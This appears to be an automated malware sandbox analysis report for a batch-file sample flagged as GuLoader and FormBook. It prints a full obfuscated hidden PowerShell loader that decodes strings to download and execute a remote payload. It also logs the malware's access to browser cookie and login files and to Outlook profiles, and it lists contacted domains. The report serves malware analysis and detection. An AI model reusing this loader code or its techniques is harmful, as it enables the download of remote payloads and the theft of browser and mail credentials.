          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners';if (${host}.currentculture) {$cabalismsbryderens++;}function antikvitetsforretnings($rodfunktionerne){$byggeforetagenders156=$rodfunktionerne.length-$cabalismsbryderens;$sinecural='substr';$sinecural+='ing';for( $cabalism=4;$cabalism -lt $byggeforetagenders156;$cabalism+=5){$decisionen+=$rodfunktionerne.$sinecural.invoke( $cabalism, $cabalismsbryderens);}$decisionen;}function unthrust($meagrely){ . ($eksperter) ($meagrely);}$antoninas=antikvitetsforretnings 'dittmcineofutizantiisammlcarblmorpaudny/illi5fa g.chec0subc .ul(ubehw ae,istrinconvd hanofr kwnyvlsdiat embrntocot gli conv1 ,dd0klip.sena0bald; s h forewr,trire,ongenn6s,ol4 opt;.avi strx,erm6mod,4stal; far baglrostevsla,:inqi1akti2 fed1.mrk. g,t0,esk)kamg debgnatie,atrcskank rono reh/vrts2 aft0komp1 jrv0ort.0.ini1atla0ek,k1,nth udliftizwicadiralomegenaf,oreoegesxa,at/omr.1ma,d2vol 1 unr.fort0home ';$torumslejligheds=antikvitetsforretnings 'bigwu py,sbabbevarmrdisp-forea laggluthelyseno.detel,n ';$nucleli=antikvitetsforretnings 'fa,ah nkatde otfe.lp,borsinhi:no p/spek/aageebuescsidsopsyknond,s cuttnipsr eriaresem.tyrehybrdferoi aanaove .denacjagaonondm ku /undet.ncoe.ortgout,lsinubhvalrclavnhilldempoe oddrenkeifantedelersail.fervsscrins enpc re ';$udarte=antikvitetsforretnings 'hytt>sony ';$eksperter=antikvitetsforretnings 'guttivirke,trexscor ';$arabin='granden';$martinetishness = antikvitetsforretnings 'vande h.wcaabehroeroudtr dec%s,lda b,upreg,pov,rd ek.aprovtd.coadung%cavi\,uvickontopredukonsm niaaut ra bea f rtunheewelf. autbbe.aid bbcal m sta&mask& ual heale ti.c pl,hvippo biv synttl uc ';unthrust (antikvitetsforretnings 'maxi$em,og .ncl b ioh.rsbslutaintel pol:it,mm,opeedru.tbegialendl ostiteltsskrumswad= oms(reloc.sonmantedfore sage/embaczibe efte$deprmp,ntaudfrrb,sittissizircntu.seposstskovi sa smasshu.bandesiepertshimmsover)brne ');unthrust (antikvitetsforretnings 'un t$popugodiolnylooh,peb umpabgeblnucl:crantconca vanno.ttdto,seopdrmap,rcanisy.etvkunroefamill.ngsg st=,erv$s udnindsulikvcfriglsatsebastljakoiisot. consuninpsa.vl hiciansttbort( jer$ nopucystdanglaherirrelit dukedisp).run ');unthrust (antikvitetsforretnings ' ret[d,osnrecre pemtfarb.enmes,aboeklynrvi,tvikeyiudsvcpremep ckpunioodespibrevnscletk nsm sieare snhjemanonvgklaseafter.too] ,is:paam: sups st epan
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners';if (${host}.currentculture) {$cabalismsbryderens++;}function antikvitetsforretnings($rodfunktionerne){$byggeforetagenders156=$rodfunktionerne.length-$cabalismsbryderens;$sinecural='substr';$sinecural+='ing';for( $cabalism=4;$cabalism -lt $byggeforetagenders156;$cabalism+=5){$decisionen+=$rodfunktionerne.$sinecural.invoke( $cabalism, $cabalismsbryderens);}$decisionen;}function unthrust($meagrely){ . ($eksperter) ($meagrely);}$antoninas=antikvitetsforretnings 'dittmcineofutizantiisammlcarblmorpaudny/illi5fa g.chec0subc .ul(ubehw ae,istrinconvd hanofr kwnyvlsdiat embrntocot gli conv1 ,dd0klip.sena0bald; s h forewr,trire,ongenn6s,ol4 opt;.avi strx,erm6mod,4stal; far baglrostevsla,:inqi1akti2 fed1.mrk. g,t0,esk)kamg debgnatie,atrcskank rono reh/vrts2 aft0komp1 jrv0ort.0.ini1atla0ek,k1,nth udliftizwicadiralomegenaf,oreoegesxa,at/omr.1ma,d2vol 1 unr.fort0home ';$torumslejligheds=antikvitetsforretnings 'bigwu py,sbabbevarmrdisp-forea laggluthelyseno.detel,n ';$nucleli=antikvitetsforretnings 'fa,ah nkatde otfe.lp,borsinhi:no p/spek/aageebuescsidsopsyknond,s cuttnipsr eriaresem.tyrehybrdferoi aanaove .denacjagaonondm ku /undet.ncoe.ortgout,lsinubhvalrclavnhilldempoe oddrenkeifantedelersail.fervsscrins enpc re ';$udarte=antikvitetsforretnings 'hytt>sony ';$eksperter=antikvitetsforretnings 'guttivirke,trexscor ';$arabin='granden';$martinetishness = antikvitetsforretnings 'vande h.wcaabehroeroudtr dec%s,lda b,upreg,pov,rd ek.aprovtd.coadung%cavi\,uvickontopredukonsm niaaut ra bea f rtunheewelf. autbbe.aid bbcal m sta&mask& ual heale ti.c pl,hvippo biv synttl uc ';unthrust (antikvitetsforretnings 'maxi$em,og .ncl b ioh.rsbslutaintel pol:it,mm,opeedru.tbegialendl ostiteltsskrumswad= oms(reloc.sonmantedfore sage/embaczibe efte$deprmp,ntaudfrrb,sittissizircntu.seposstskovi sa smasshu.bandesiepertshimmsover)brne ');unthrust (antikvitetsforretnings 'un t$popugodiolnylooh,peb umpabgeblnucl:crantconca vanno.ttdto,seopdrmap,rcanisy.etvkunroefamill.ngsg st=,erv$s udnindsulikvcfriglsatsebastljakoiisot. consuninpsa.vl hiciansttbort( jer$ nopucystdanglaherirrelit dukedisp).run ');unthrust (antikvitetsforretnings ' ret[d,osnrecre pemtfarb.enmes,aboeklynrvi,tvikeyiudsvcpremep ckpunioodespibrevnscletk nsm sieare snhjemanonvgklaseafter.too
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners';if (${host}.currentculture) {$cabalismsbryderens++;}function antikvitetsforretnings($rodfunktionerne){$byggeforetagenders156=$rodfunktionerne.length-$cabalismsbryderens;$sinecural='substr';$sinecural+='ing';for( $cabalism=4;$cabalism -lt $byggeforetagenders156;$cabalism+=5){$decisionen+=$rodfunktionerne.$sinecural.invoke( $cabalism, $cabalismsbryderens);}$decisionen;}function unthrust($meagrely){ . ($eksperter) ($meagrely);}$antoninas=antikvitetsforretnings 'dittmcineofutizantiisammlcarblmorpaudny/illi5fa g.chec0subc .ul(ubehw ae,istrinconvd hanofr kwnyvlsdiat embrntocot gli conv1 ,dd0klip.sena0bald; s h forewr,trire,ongenn6s,ol4 opt;.avi strx,erm6mod,4stal; far baglrostevsla,:inqi1akti2 fed1.mrk. g,t0,esk)kamg debgnatie,atrcskank rono reh/vrts2 aft0komp1 jrv0ort.0.ini1atla0ek,k1,nth udliftizwicadiralomegenaf,oreoegesxa,at/omr.1ma,d2vol 1 unr.fort0home ';$torumslejligheds=antikvitetsforretnings 'bigwu py,sbabbevarmrdisp-forea laggluthelyseno.detel,n ';$nucleli=antikvitetsforretnings 'fa,ah nkatde otfe.lp,borsinhi:no p/spek/aageebuescsidsopsyknond,s cuttnipsr eriaresem.tyrehybrdferoi aanaove .denacjagaonondm ku /undet.ncoe.ortgout,lsinubhvalrclavnhilldempoe oddrenkeifantedelersail.fervsscrins enpc re ';$udarte=antikvitetsforretnings 'hytt>sony ';$eksperter=antikvitetsforretnings 'guttivirke,trexscor ';$arabin='granden';$martinetishness = antikvitetsforretnings 'vande h.wcaabehroeroudtr dec%s,lda b,upreg,pov,rd ek.aprovtd.coadung%cavi\,uvickontopredukonsm niaaut ra bea f rtunheewelf. autbbe.aid bbcal m sta&mask& ual heale ti.c pl,hvippo biv synttl uc ';unthrust (antikvitetsforretnings 'maxi$em,og .ncl b ioh.rsbslutaintel pol:it,mm,opeedru.tbegialendl ostiteltsskrumswad= oms(reloc.sonmantedfore sage/embaczibe efte$deprmp,ntaudfrrb,sittissizircntu.seposstskovi sa smasshu.bandesiepertshimmsover)brne ');unthrust (antikvitetsforretnings 'un t$popugodiolnylooh,peb umpabgeblnucl:crantconca vanno.ttdto,seopdrmap,rcanisy.etvkunroefamill.ngsg st=,erv$s udnindsulikvcfriglsatsebastljakoiisot. consuninpsa.vl hiciansttbort( jer$ nopucystdanglaherirrelit dukedisp).run ');unthrust (antikvitetsforretnings ' ret[d,osnrecre pemtfarb.enmes,aboeklynrvi,tvikeyiudsvcpremep ckpunioodespibrevnscletk nsm sieare snhjemanonvgklaseafter.too] ,is:paam: sups st epanJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners decisionen landbrugsmssiges sapremia157 tandemcykels nucleli isopropenyl albatroserne granden udbredes fluesnapperen sideloebende ernestines karakterbristernes unprejudice udsigelsen moonward hovedbanegaarde fremskridtsbyerne sildigste readaptable rendyrkede opprobriated protococcal hjlpefunktioners';if (${host}.currentculture) {$cabalismsbryderens++;}function antikvitetsforretnings($rodfunktionerne){$byggeforetagenders156=$rodfunktionerne.length-$cabalismsbryderens;$sinecural='substr';$sinecural+='ing';for( $cabalism=4;$cabalism -lt $byggeforetagenders156;$cabalism+=5){$decisionen+=$rodfunktionerne.$sinecural.invoke( $cabalism, $cabalismsbryderens);}$decisionen;}function unthrust($meagrely){ . ($eksperter) ($meagrely);}$antoninas=antikvitetsforretnings 'dittmcineofutizantiisammlcarblmorpaudny/illi5fa g.chec0subc .ul(ubehw ae,istrinconvd hanofr kwnyvlsdiat embrntocot gli conv1 ,dd0klip.sena0bald; s h forewr,trire,ongenn6s,ol4 opt;.avi strx,erm6mod,4stal; far baglrostevsla,:inqi1akti2 fed1.mrk. g,t0,esk)kamg debgnatie,atrcskank rono reh/vrts2 aft0komp1 jrv0ort.0.ini1atla0ek,k1,nth udliftizwicadiralomegenaf,oreoegesxa,at/omr.1ma,d2vol 1 unr.fort0home ';$torumslejligheds=antikvitetsforretnings 'bigwu py,sbabbevarmrdisp-forea laggluthelyseno.detel,n ';$nucleli=antikvitetsforretnings 'fa,ah nkatde otfe.lp,borsinhi:no p/spek/aageebuescsidsopsyknond,s cuttnipsr eriaresem.tyrehybrdferoi aanaove .denacjagaonondm ku /undet.ncoe.ortgout,lsinubhvalrclavnhilldempoe oddrenkeifantedelersail.fervsscrins enpc re ';$udarte=antikvitetsforretnings 'hytt>sony ';$eksperter=antikvitetsforretnings 'guttivirke,trexscor ';$arabin='granden';$martinetishness = antikvitetsforretnings 'vande h.wcaabehroeroudtr dec%s,lda b,upreg,pov,rd ek.aprovtd.coadung%cavi\,uvickontopredukonsm niaaut ra bea f rtunheewelf. autbbe.aid bbcal m sta&mask& ual heale ti.c pl,hvippo biv synttl uc ';unthrust (antikvitetsforretnings 'maxi$em,og .ncl b ioh.rsbslutaintel pol:it,mm,opeedru.tbegialendl ostiteltsskrumswad= oms(reloc.sonmantedfore sage/embaczibe efte$deprmp,ntaudfrrb,sittissizircntu.seposstskovi sa smasshu.bandesiepertshimmsover)brne ');unthrust (antikvitetsforretnings 'un t$popugodiolnylooh,peb umpabgeblnucl:crantconca vanno.ttdto,seopdrmap,rcanisy.etvkunroefamill.ngsg st=,erv$s udnindsulikvcfriglsatsebastljakoiisot. consuninpsa.vl hiciansttbort( jer$ nopucystdanglaherirrelit dukedisp).run ');unthrust (antikvitetsforretnings ' ret[d,osnrecre pemtfarb.enmes,aboeklynrvi,tvikeyiudsvcpremep ckpunioodespibrevnscletk nsm sieare snhjemanonvgklaseafter.tooJump to behavior
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: nPzDKsDmTWqJ.exe, 0000000D.00000000.2717316252.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287884979.0000000001881000.00000002.00000001.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287883261.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		1
          Scripting          		1
          Abuse Elevation Control Mechanism          		11
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts21
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSASS Memory113
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		1
          Registry Run Keys / Startup Folder          		312
          Process Injection          		3
          Obfuscated Files or Information          		Security Account Manager1
          Query Registry          		SMB/Windows Admin Shares1
          Email Collection          		3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder          		1
          Software Packing          		NTDS121
          Security Software Discovery          		Distributed Component Object ModelInput Capture4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials31
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Rundll32          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1471448 Sample: rFV-452747284IN.bat Startdate: 11/07/2024 Architecture: WINDOWS Score: 100 56 www.387mfyr.sbs 2->56 58 tejarat-gram.com 2->58 60 econstramedia.com 2->60 68 Malicious sample detected (through community Yara rule) 2->68 70 Yara detected FormBook 2->70 72 Yara detected GuLoader 2->72 74 4 other signatures 2->74 12 cmd.exe 1 2->12         started        15 wab.exe 1 2->15         started        17 wab.exe 3 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 92 Suspicious powershell command line found 12->92 94 Obfuscated command line found 12->94 96 Very long command line found 12->96 21 powershell.exe 14 23 12->21         started        25 conhost.exe 12->25         started        process6 dnsIp7 64 econstramedia.com 103.211.216.55, 443, 49704 PUBLIC-DOMAIN-REGISTRYUS Seychelles 21->64 78 Suspicious powershell command line found 21->78 80 Obfuscated command line found 21->80 82 Very long command line found 21->82 84 Found suspicious powershell code related to unpacking or dynamic code loading 21->84 27 powershell.exe 17 21->27         